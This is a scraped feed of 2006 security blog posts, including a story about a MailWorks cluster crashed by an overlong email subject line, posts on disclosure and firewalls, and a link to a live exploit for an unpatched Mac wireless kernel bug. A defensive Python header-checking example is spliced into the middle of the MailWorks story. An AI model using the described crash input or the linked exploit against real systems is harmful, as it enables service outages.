email standard.  Previous standard was PROFS on the mainframe.  We had enough MailWorks users going that we needed a VMS cluster to deal with the volume, and have some redundancy in case of an outage, maintenance, etc... all the stuff you want a cluster for.  I'm actually DEC certified on some of this stuff.  I get lots of use out of that now, let me tell you.&lt;br /&gt;&lt;br /&gt;One day, mail goes down.  The senior VMS admins determine that the MailWorks server process had gone down.  On all the machines in the cluster.  At the same time.&lt;br /&gt;&lt;br /&gt;OK.  So they try to run it again, and it comes up.  As they are trying to bring it up on another machine in the cluster, they both go down again.  It had only been up for a few minutes.  So they try one machine by itself.  It runs for a minute or two, and goes down again.&lt;br /&gt;&lt;br /&gt;They do some dump analysis, and can see that the process is crashing.  Not that this helps with how to fix it.  After a bit of in-house fiddling, DEC is called.  Some phone support doesn't help, must be a hardware problem somewhere.  On every box in the cluster?  OK, a hardware problem in the cluster interconnect (CI), then.  Waste time, cannibalize hardware, break cluster, determine that problem happens on one server, no cluster, and machine works fine for all other software.  Dispatch DEC technician to site.&lt;br /&gt;&lt;br /&gt;Reload OS, MailWorks software, runs clean.  Problem solved?  No, when you give it the mail spool, it crashes again.  And yes, we DO need our old mail, thanks anyway.&lt;br /&gt;&lt;br /&gt;But now we know it's something in our mail files that is causing it.  Maybe we can figure that out and surgically remove it?  
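Taking the diagnosis below as given (one message in the spool crashed the server, and each cluster node that took over read the same spool and died the same way), there are two separate defects worth pulling apart: a header value that was never length-checked before it was stored, and a failover design with no memory of what killed the last node. As an added example, not MailWorks or DEC code and not the fix DEC eventually shipped, here is a small spool processor in Python that handles both: it bounds every header value as it is parsed, and it quarantines a message that fails so the next node skips it instead of repeating the crash. The 1024-byte limit, the message layout, the dict-based spool and the shared quarantine dict are all assumptions made for this example.

```python
# Added example, not MailWorks or DEC code: a spool processor that bounds
# header length before storing anything and quarantines a message that
# fails, so a failover node does not re-read it and die the same way.
# SUBJECT_MAX, the message layout and the spool structure are assumptions.

SUBJECT_MAX = 1024  # assumed bound; the post's own figure is "1K or so"


class PoisonMessage(Exception):
    """A message that cannot be processed safely and must not be retried."""


def parse_headers(raw, max_value=SUBJECT_MAX):
    """Parse RFC 822-style headers from a raw message (LF line endings assumed).

    Folded continuation lines are joined onto the previous header. Every
    header value is length-checked each time it grows, before anything
    downstream could copy it into a fixed-size buffer. Leading whitespace is
    kept on purpose: a subject that is thousands of spaces must count as
    thousands of bytes, not zero.
    """
    head = raw.split("\n\n", 1)[0]          # headers end at the first blank line
    headers = {}
    current = None
    for line in head.split("\n"):
        if line[:1] in (" ", "\t"):          # folded continuation of the previous header
            if current is None:
                raise PoisonMessage("continuation line before any header")
            headers[current] += line
        else:
            name, sep, value = line.partition(":")
            if not sep or not name.strip():
                raise PoisonMessage("malformed header line %r" % line[:40])
            current = name.strip().lower()
            headers[current] = value[1:] if value.startswith(" ") else value
        if len(headers[current]) > max_value:
            raise PoisonMessage("header %r is %d bytes, limit %d"
                                % (current, len(headers[current]), max_value))
    return headers


def process_spool(spool, quarantine=None):
    """Deliver and remove messages from `spool` (dict: id -> raw text).

    With a `quarantine` dict shared by every node (think: a file on the
    cluster's shared disk), a poison message is recorded there and skipped
    on every later pass. With quarantine=None it behaves like the server in
    the story: the failure escapes, and the next node to read the same spool
    hits the same message. Returns the (id, subject) pairs delivered.
    """
    delivered = []
    for msg_id, raw in list(spool.items()):
        if quarantine is not None and msg_id in quarantine:
            continue
        try:
            headers = parse_headers(raw)
        except PoisonMessage as err:
            if quarantine is None:
                raise                          # the "crash": nothing stops the next node repeating it
            quarantine[msg_id] = str(err)
            continue
        delivered.append((msg_id, headers.get("subject", "")))
        del spool[msg_id]
    return delivered


def simulate_failover(spool):
    """Node A runs the spool, then node B takes over the same spool and the
    same quarantine. Returns (ids A delivered, ids B delivered, quarantined ids)."""
    quarantine = {}
    a = [i for i, _ in process_spool(spool, quarantine)]
    b = [i for i, _ in process_spool(spool, quarantine)]
    return a, b, sorted(quarantine)


def crashes_without_quarantine(spool):
    """True if a node with no quarantine dies on this spool, as in the story."""
    try:
        process_spool(spool, quarantine=None)
    except PoisonMessage:
        return True
    return False


def sample_spool():
    """Constructed messages, including one sent with the spacebar held down."""
    return {
        "m1": "From: a@example.com\nTo: b@example.com\nSubject: lunch?\n\nnoon?\n",
        "m2": "From: d@example.com\nSubject: " + " " * 3000 + "\n\nhi\n",
        "m3": "From: c@example.com\nSubject: status\n report\n\nall fine\n",
    }


if __name__ == "__main__":
    print("no quarantine, node crashes:", crashes_without_quarantine(sample_spool()))
    a, b, q = simulate_failover(sample_spool())
    print("node A delivered:", a, "node B delivered:", b, "quarantined:", q)
```

Run it and the no-quarantine path raises PoisonMessage on the second message, which is the story's outage in one line; with the shared quarantine, node A delivers two messages and sets one aside, and node B has nothing left to trip over. The bound is checked at exactly 1024 bytes: a value of that length passes, one byte more is refused.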
OK, so they binary split the files, and determine that a single email is causing the problem.&lt;br /&gt;&lt;br /&gt;This is several days into an outage, mind you.&lt;br /&gt;&lt;br /&gt;Email is examined, and it turns out to have a really long subject line, like thousands of characters, almost all spaces.  Some experimentation shows that once you hit a subject line of 1K or so in length, MailWorks takes a dive.  (Ah yes, I saw that light bulb go off over your head.)  And if you have a cluster, when one server crashes, the next one dutifully takes over mail processing, until it hits that same message.&lt;br /&gt;&lt;br /&gt;Message is purged, and people can actually get back to work.&lt;br /&gt;&lt;br /&gt;They track down the user who sent the killer email, to find out what the heck she was thinking.  Turns out she was eating breakfast, and reading her email.  A piece of Grape Nuts cereal lodged in her keyboard, and managed to hold the spacebar down.  She still sent the email after that, but remembered having to dislodge the offending Grape Nut.&lt;br /&gt;&lt;br /&gt;So an entire VMS MailWorks cluster got taken out for days by a piece of Grape Nuts.  But that's not the punchline.&lt;br /&gt;&lt;br /&gt;After DEC support had been largely useless for days and our guys had more or less had to fix it themselves, we submitted a fix request.  We didn't want this happening again.  We were able to send a specific problem description, number of characters, sample email, the whole bit.&lt;br /&gt;&lt;br /&gt;DEC's response was: Oh yeah, we know about that!  Here, we've had a patch available for a while.  Why weren't we (one of the largest MailWorks installations in the world) told about that?  Oh, uh... you have to call with a problem description that indicates that patch is needed.  OK, and when we DID call with a problem like that?  And you sent out a technician, why didn't he know?  Why don't you publish the patch list?  Uh.. 
well...&lt;br /&gt;&lt;br /&gt;And I believe that was my first practical introduction to buffer overflows and vendor patching.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5948037449707334779?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5948037449707334779/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5948037449707334779' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5948037449707334779'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5948037449707334779'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/11/crashing-mailworks.html' title='Crashing MailWorks'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-487297425598581449</id><published>2006-11-02T21:47:00.000-08:00</published><updated>2006-11-02T22:14:26.365-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS X sucks'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Threat vs. 
vulnerability</title><content type='html'>Inspired in part by &lt;a href="http://taosecurity.blogspot.com/2006/05/threat-term-used-properly-in.html"&gt;Richard Bejtlich&lt;/a&gt;,  I present Yet Another Horrible Information Security Analogy (YAHISA): &lt;span style="font-weight: bold;"&gt;A tale of bunnies and kitties&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Imagine a lush green field of grass and clover, where bunnies frolic and play.  These are cute white bunnies, with pink eyes.  And the occasional black bunny, which inexplicably costs more.  The bunnies in this field have no natural predators.  The wolves don't know about this field.&lt;br /&gt;&lt;br /&gt;Now, picture a city cat that roams the streets, getting into fights, disappearing for days at a time.  When it comes home, it's missing a little more of its ear, or occasionally needs to be stitched up.  If it gets into a fight, sometimes it wins, sometimes it loses.  It will eventually be run over by a car.  Its bloated carcass will be poked by children with sticks.&lt;br /&gt;&lt;br /&gt;The bunnies are vulnerable.  
The kitty is vulnerable, and has threats.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-487297425598581449?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/487297425598581449/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=487297425598581449' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/487297425598581449'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/487297425598581449'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/11/threat-vs-vulnerability.html' title='Threat vs. vulnerability'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5231870360369553062</id><published>2006-11-01T11:23:00.000-08:00</published><updated>2006-11-01T18:22:21.330-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS X sucks'/><title type='text'>You want Mac wireless bugs?</title><content type='html'>So, the &lt;a href="http://www.kernelfun.blogspot.com/"&gt;Month of Kernel Bugs&lt;/a&gt; (MoKB) begins today.  
They start by releasing a &lt;a href="http://metasploit.com/svn/framework3/trunk/modules/auxiliary/dos/wireless/daringphucball.rb"&gt;live exploit&lt;/a&gt; for a remote kernel &lt;a href="http://projects.info-pull.com/mokb/MOKB-01-11-2006.html"&gt;bug&lt;/a&gt; in older PPC Macs with Orinoco-based chipsets.  "1999-2003 PowerBooks, iMacs".  (Note: I've done no independent verification of the bug, I just trust the people reporting it.)&lt;br /&gt;&lt;br /&gt;With no official notification to Apple, and no patch available.&lt;br /&gt;&lt;br /&gt;&lt;strike&gt;Even though the machine I'm typing this on right now is vulnerable to the exploit,&lt;/strike&gt; I believe this is the appropriate way to handle this release.  Why?  Because of the way Apple handled the same kind of issue with David Maynor and Johnny Cache, of course.&lt;br /&gt;&lt;br /&gt;Apple thinks it should not even acknowledge unpatched bugs.  It (apparently) thinks that it should issue press releases denying the issue and use vague legal threats against researchers to "protect customers".&lt;br /&gt;&lt;br /&gt;This kind of release is the result.  If Apple doesn't want to play responsible disclosure, then the researchers will be happy to oblige.  I trust there will be no denial of the problem by any interested parties this time?&lt;br /&gt;&lt;br /&gt;(No, not really.  The Mac zealots still won't believe it.  But it sounds good, anyway.)&lt;br /&gt;&lt;br /&gt;Update: I'm taking my Mac off the list of affected machines.  It's an iBook G4 with an Airport Extreme that was purchased separately.  It appears that the Extreme (802.11g) version of the Airport isn't affected by this particular bug.  I might as well try to be careful about technical accuracy.  
I've seen how the Mac community reacts to any little inaccuracy.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5231870360369553062?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5231870360369553062/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5231870360369553062' title='27 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5231870360369553062'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5231870360369553062'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/11/you-want-mac-wireless-bugs.html' title='You want Mac wireless bugs?'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>27</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-9172204065552889454</id><published>2006-10-28T13:48:00.000-07:00</published><updated>2006-10-28T14:00:50.890-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Purpose of a firewall</title><content type='html'>Periodically, I see statements like "firewalls are useless" or "firewalls are dead".  (Or IDS, or antivirus, pick your favorite security product category.)  Does that mean you no longer need a firewall?  Of course not.  What it really means is a couple of things.  One, a firewall is such an obvious requirement that it is just a given.  
And two, client-side holes are exploited so frequently that firewalls are not considered to contribute significantly as a preventative measure anymore.&lt;br /&gt;&lt;br /&gt;Allow me to remind everyone what the purpose of a firewall is.  A firewall exists so that you can do something risky on the protected side.  That's it.  You want to use Windows networking?  You want to use cleartext protocols?  You want to use &lt;a href="http://www.matasano.com/log/407/do-enterprise-management-systems-dream-of-electric-sheep/"&gt;enterprise software&lt;/a&gt;?  (Or is that &lt;a href="http://www.bigfix.com/softwaretruth/"&gt;Enterprise Software&lt;/a&gt;.)  Then you do that kind of thing behind a firewall.&lt;br /&gt;&lt;br /&gt;If the systems, software, and protocols were hardened enough that they could be on a bare Internet connection, you wouldn't need a firewall.  But every company I've seen uses at least one piece of software that can't make that cut.  So they have a firewall.&lt;br /&gt;&lt;br /&gt;Firewalls exist so that you can do risky things on the protected side.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-9172204065552889454?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/9172204065552889454/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=9172204065552889454' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/9172204065552889454'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/9172204065552889454'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/10/purpose-of-firewall.html' title='Purpose of a 
firewall'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-1535422106691563190</id><published>2006-10-23T16:49:00.000-07:00</published><updated>2006-10-23T17:01:56.415-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Microsoft vs. McAfee &amp; Symantec</title><content type='html'>I write for the &lt;a href="http://windowssecrets.com/"&gt;Windows Secrets&lt;/a&gt; newsletter.  Usually, you can only see my articles if you're a paid subscriber.   Every once in a while, I end up writing a special update, or the featured article.  Meaning, you can read them for free.  I figure if you read this blog, then you probably have some interest in my writing.&lt;br /&gt;&lt;br /&gt;This &lt;a href="http://windowssecrets.com/comp/061023/#story1"&gt;article&lt;/a&gt; is my take on the whole debate about Microsoft locking vendors out of the Vista 64-bit kernel.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-1535422106691563190?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/1535422106691563190/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=1535422106691563190' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1535422106691563190'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/18579416/posts/default/1535422106691563190'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/10/microsoft-vs-mcafee-symantec.html' title='Microsoft vs. McAfee &amp; Symantec'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8357058249097762838</id><published>2006-10-21T18:47:00.000-07:00</published><updated>2006-10-21T19:10:01.498-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RE'/><category scheme='http://www.blogger.com/atom/ns#' term='spare brain'/><title type='text'>Nicolas Brulez analyses a virus</title><content type='html'>Nice example of a virus/bot analysis by Nicolas Brulez at Websense:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.websense.com/securitylabs/blog/blog.php?BlogID=91"&gt;http://www.websense.com/securitylabs/blog/blog.php?BlogID=91 &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Has some good IDA Pro tips.  Nicolas is a really good reverse engineer.  
He taught me the proper way to unpack a file, and helped me give a presentation at the first RECon.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8357058249097762838?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8357058249097762838/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8357058249097762838' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8357058249097762838'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8357058249097762838'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/10/nicolas-brulez-analysis-virus.html' title='Nicolas Brulez analyses a virus'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5773882995188811045</id><published>2006-10-21T16:15:00.000-07:00</published><updated>2006-10-21T16:21:30.440-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>RSS Feed</title><content type='html'>I suspect that no one has as of this writing, but if you've subscribed to my blog with the default Blogger Atom feed, I would appreciate if you switch to my Feedburner one.  
You can see it in the upper-right if you're reading this in a browser, or use this link:&lt;br /&gt;&lt;a href="http://feeds.feedburner.com/Ryanlrussell"&gt;http://feeds.feedburner.com/Ryanlrussell&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;This is so I can keep track of you if you read this via RSS.  I've also added a Site Meter counter.  I'm pretty new to Blogger.  If I screwed up something, please let me know.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5773882995188811045?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5773882995188811045/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5773882995188811045' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5773882995188811045'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5773882995188811045'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/10/rss-feed.html' title='RSS Feed'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4746417101563823111</id><published>2006-10-21T10:58:00.000-07:00</published><updated>2006-10-21T19:40:01.559-07:00</updated><title type='text'>So what's up with Digg?</title><content type='html'>First thing: I am an utter 
newb when it comes to Digg.com.  So a lot of this post amounts to stupid user questions.  But hey, maybe I'll get some answers.  I did try to do some searching, but the sheer volume of "digg" hits with any given keyword makes this somewhat challenging.  The volume is one of the things that makes Digg useful, but I normally read it through an RSS feed.&lt;br /&gt;&lt;br /&gt;Yesterday, I was in a debating mood.  So I waded into a Mac security discussion on Digg, here:&lt;br /&gt;&lt;a href="http://digg.com/tech_news/Mac_attacks_rare_but_rising"&gt;http://digg.com/tech_news/Mac_attacks_rare_but_rising&lt;/a&gt;&lt;br /&gt;This is me on Digg:&lt;br /&gt;&lt;a href="http://digg.com/users/ryanlrussell/dugg"&gt;http://digg.com/users/ryanlrussell/dugg&lt;/a&gt;&lt;br /&gt;(And no argument from me that the original article there is inflammatory and inaccurate.  I wanted to argue with the people who don't know the difference between threats and vulnerabilities, and so think the lack of threats means there are no vulnerabilities.)&lt;br /&gt;&lt;br /&gt;A few brief observations.  
First off, tons of Mac fanboys who aren't particularly knowledgeable about security, but have a lot of blind faith.  No surprise.  If I make a post to the contrary, give a counterexample, or ask someone to explain their position, it gets dugg down.  Also no real surprise, I've seen this happen before with other users.  But I find the volume and consistency of that behavior interesting.  It appears that if you don't like or don't agree with someone's post, you give it a negative digg.  Well, &lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;I&lt;/span&gt;&lt;/span&gt; don't, at least not yet.  If you're discussing something, simply shouting down the other person is pointless and rude.  But I see that that is how it works.  I'm guessing it's gameable, too?  By just simply having multiple accounts?&lt;br /&gt;&lt;br /&gt;I see that as broken.  And this is from the point of view of a longtime Slashdot user.  Sure, I'm used to seeing unpopular opinions modded down on Slashdot in a similar fashion.  But not nearly to the same degree.  Why is that?  Because Slashdot has caps on both mod points, and how high or low something can be modded?  And most people don't get mod points often?  
Because you have to supply a reason for the moderation (interesting, flamebait, etc...)?  Because you can see someone's ID number, and can tell how long they have been on Slashdot?  Because you can't both moderate and participate in the same discussion?  I'm not sure, probably some combination of those and other factors I haven't observed.&lt;br /&gt;&lt;br /&gt;I will throw one opinion out there, that it's probably a bad idea to simply give people an infinite supply of anonymous red buttons to shout down someone they disagree with.  Especially if those buttons don't obviously represent some objective quality of the post in question.&lt;br /&gt;&lt;br /&gt;Now, some regular bugs/questions/feature requests:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Why aren't discussions threaded?  Why, in order to reply to a particular comment, do I have to go find the parent to the whole thread?  Then I probably have to click "show comment" because it was dugg down too far.  Then click reply.  Then scroll all the way back up and find the post I wanted to reply to.  Then manually copy the person's username into my post to show which person I'm replying to.  Then cut-and-paste the text I want to quote.  Doesn't seem very Web2.0y.  
How about if there's just a "reply" button on every post so that it's clear who I'm replying to, and it could even &lt;span onclick="BLOG_clickHandler(this)" class="blsp-spelling-error" id="SPELLING_ERROR_20"&gt;autoquote&lt;/span&gt;.  You know, like every email client for the last 20 years.&lt;/li&gt;&lt;li&gt;How do I know when a discussion I'm participating in has been responded to?  Part of this is related to the previous threading issue, I'm sure.  It's hard to track who is talking to whom, when the discussion is almost entirely flat.  So, fix that, and then give me the option of getting an email when someone responds to me.  Or at least a link somewhere on the site where I can see new responses I haven't viewed yet.  Where's my "subscribe to this thread" button?&lt;/li&gt;&lt;li&gt;There's no way for me to link to a particular comment?&lt;/li&gt;&lt;li&gt;When digging stories, I can filter by particular topics and properties of the sumissions (age, popularity, etc..)  How do I filter out the ones I've already dugg?&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Where is &lt;span onclick="BLOG_clickHandler(this)" class="blsp-spelling-error" id="SPELLING_ERROR_21"&gt;Digg's&lt;/span&gt; &lt;span onclick="BLOG_clickHandler(this)" class="blsp-spelling-error" id="SPELLING_ERROR_22"&gt;todo&lt;/span&gt;/upcoming features list?&lt;/li&gt;&lt;li&gt;Where the bug database for &lt;span onclick="BLOG_clickHandler(this)" class="blsp-spelling-error" id="SPELLING_ERROR_23"&gt;Digg&lt;/span&gt;, so I can see if these things are known or have been requested?&lt;/li&gt;&lt;/ul&gt;I'm not just trying to complain.  Some of these things must have simple answers, and if someone would supply those for me, I would appreciate it.  
I have tried to do some searching, but "&lt;span onclick="BLOG_clickHandler(this)" class="blsp-spelling-error" id="SPELLING_ERROR_24"&gt;digg&lt;/span&gt;" and any keyword you can think of will simply pull up a list of stories that have been linked from &lt;span onclick="BLOG_clickHandler(this)" class="blsp-spelling-error" id="SPELLING_ERROR_25"&gt;Digg&lt;/span&gt; for that topic.  There needs to be a keyword that indicates that it's about &lt;span onclick="BLOG_clickHandler(this)" class="blsp-spelling-error" id="SPELLING_ERROR_26"&gt;Digg&lt;/span&gt; itself, "&lt;span onclick="BLOG_clickHandler(this)" class="blsp-spelling-error" id="SPELLING_ERROR_27"&gt;metadigg&lt;/span&gt;" perhaps.&lt;br /&gt;&lt;br /&gt;And, naturally, I have dugg this blog entry, so I can see some of the rest of the proccess, and maybe some answers to my questions.  If you diggers do end up coming and helping me out, then I thank you in advance.&lt;br /&gt;&lt;a href="http://digg.com/design/Some_observations_on_Digg_from_a_newbie"&gt;http://digg.com/design/Some_observations_on_Digg_from_a_newbie&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-4746417101563823111?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4746417101563823111/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=4746417101563823111' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4746417101563823111'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4746417101563823111'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/10/so-whats-up-with-digg.html' title='So 
what&apos;s up with Digg?'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-2584134807165654776</id><published>2006-10-21T01:08:00.000-07:00</published><updated>2006-11-06T18:30:47.169-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS X sucks'/><title type='text'>OS X Malware</title><content type='html'>Just to be up front about it: Yes, this entry was created in the spirit of stabbing OS X zealots in the eye with a lit cigarette.   Why?   It drives me absolutely insane when people who clearly have no concept of how these things work insist that Macs can't get malware, don't have vulnerabilities, or have some magic security model.   Yes, I realize trying to educate someone like that is masochistic.   However, I wanted to have a more convenient place to point to when some clueless Mac fanboy says "show me even one virus for OS X!!".&lt;br /&gt;&lt;br /&gt;I don't care to claim that the problem of malware on OS X has in any way reached significant levels.   Nor am I trying to say that it is imminent.   I &lt;span style="font-style: italic;"&gt;do&lt;/span&gt; mean to say that it is not non-existent, and that it is certainly not impossible that it could happen.&lt;br /&gt;&lt;br /&gt;So I'm going to try to maintain a list.   I'm doing "malware" here, not exploits or vulnerabilities.   For my purposes, that includes viruses, trojan horses, worms, rootkits and spyware.   I'm also going to limit this list to malware designed for OS X.   There is a long list of macro/Office based stuff, things for OS 9 and below, and so on.   
